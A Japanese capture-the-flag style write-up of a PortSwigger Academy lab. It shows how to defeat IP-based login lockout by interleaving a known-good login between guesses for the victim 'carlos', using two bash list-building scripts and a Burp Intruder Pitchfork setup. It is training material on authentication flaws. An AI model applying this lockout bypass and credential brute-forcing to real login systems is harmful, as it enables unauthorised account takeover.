【Write up】Lab: Broken brute-force protection, IP block @ PortSwigger Academy

PortSwigger Web Security Academyが提供しているLab: Broken brute-force protection, IP blockのWrite upです。

Labの概要

This lab is vulnerable due to a logic flaw in its password brute-force protection. To solve the lab, brute-force the victim's password, then log in and access their account page.

Your credentials: wiener:peter
Victim's username: carlos
Candidate passwords

Candidate passwordsでは下記のパスワードリストが提供されている。

123456
password
12345678
qwerty
123456789
12345
1234
111111
1234567
dragon
(省略)

My accountのリンクからログインページへ遷移できる。
目標はcarlosユーザーのクレデンシャル情報を取得しログインすること。

解法

まずは提供されているwiener:peterのアカウントでログインをしてみると302 Foundとsessionキーが返される。

wienerユーザーでログインできたことが分かる。

一度ログアウトし、今度は誤ったパスワードでログインを試してみるとIncorrect passwordという文字列が返される。
誤った情報でログインを3回試すとYou have made too many incorrect login attempts. Please try again in 1 minute(s).という文字列と共にリクエスト制限がかけられる。
ブルートフォース攻撃をする上でこの制限は非常に厄介なので回避したい。

この認証処理ではログインが成功するとログイン試行のカウンターがリセットされる欠陥がある。
「2回ログインに失敗し、3回目にwiener:peterでログインを成功させる」を繰り返すと無限にログインのリクエストを送ることができ、ブルートフォース攻撃が出来そうだ。

攻撃するにあたり、2つのファイルを用意する。
1つ目はLabで提供されているパスワードリストで1つおきにwienerを挿入したファイル。
pass-list.txtとして提供されているパスワードリストをファイルに保存し、pass-list-script.shを実行すれば作成できる。

pass-list-script.sh

#!/bin/bash

# 既存のテキストリストファイル名
input_file="pass-list.txt"

# 一時ファイル名
temp_file="temp.txt"

# 既存のファイルが存在しない場合はエラーメッセージを表示して終了
if [ ! -f "$input_file" ]; then
    echo "エラー: $input_file が見つかりません。"
    exit 1
fi

# 一時ファイルを作成して、`peter` を行間に挿入して書き込む
while IFS= read -r line; do
    echo "peter" >> "$temp_file"
    echo "$line" >> "$temp_file"
done < "$input_file"

# 一時ファイルを元のファイルに上書きする
mv "$temp_file" "$input_file"

echo "ファイル $input_file が更新されました。"

スクリプト実行前のpass-list.txt。

pass-list.txt

123456
password
12345678
qwerty
123456789
(省略)

スクリプトを実行し、peterが一行ずつ挿入されているファイルが作成された。

pass-list.txt

peter
123456
peter
password
peter
12345678
peter
qwerty
peter
123456789

2つ目は、wienerとcarlosが交互に記述されているファイル。
同じようにuser-list-script.shを実行すれば作成できる。

user-list-script.sh

#!/bin/bash

# 出力するファイル名
output_file="user-list.txt"

# 行数
lines=100

# ファイルが既に存在する場合は削除して新規作成
if [ -e "$output_file" ]; then
    rm "$output_file"
fi

# 100 行のテキストを生成
for ((i=1; i<=$lines; i++)); do
    # 奇数行は wiener、偶数行は carlos を書き込む
    if (( $i % 2 == 0 )); then
        echo "carlos" >> "$output_file"
    else
        echo "wiener" >> "$output_file"
    fi
done

echo "ファイル $output_file が作成されました。"

ユーザー名が交互に並んだリストが作成された。

user-list.txt

wiener
carlos
wiener
carlos
wiener
carlos
wiener
carlos

ファイルの作成が終了したら、ログインのリクエストをIntruderに設定し、Attack typeをPitchforkに、usernameとpasswordのパラメータ部分をAdd§で囲む。

次にPayloadsタブに移動、Payload setを1にし、Payload settingsのLoadから作成したユーザーリストのファイルを選択する。

Payload setを2にし、Payload settingsのLoadから作成したパスワードリストのファイルを選択する。

Resource poolタブに移動し、Create new resource poolを選択、Maximum concurrent requestsを1に設定する。

上記の設定が完了したら、右上のStart Attackボタンをクリックして攻撃開始。

wiener:peterのログインとcarlos:<パスワードリスト>のログインが交互に試行される。

ログインが成功した場合ステータスコード302で返ってくるのでフィルタリングすると、carlosユーザーのパスワードを発見できた。

最後に特定できたユーザー情報でログインしてLabは完了です。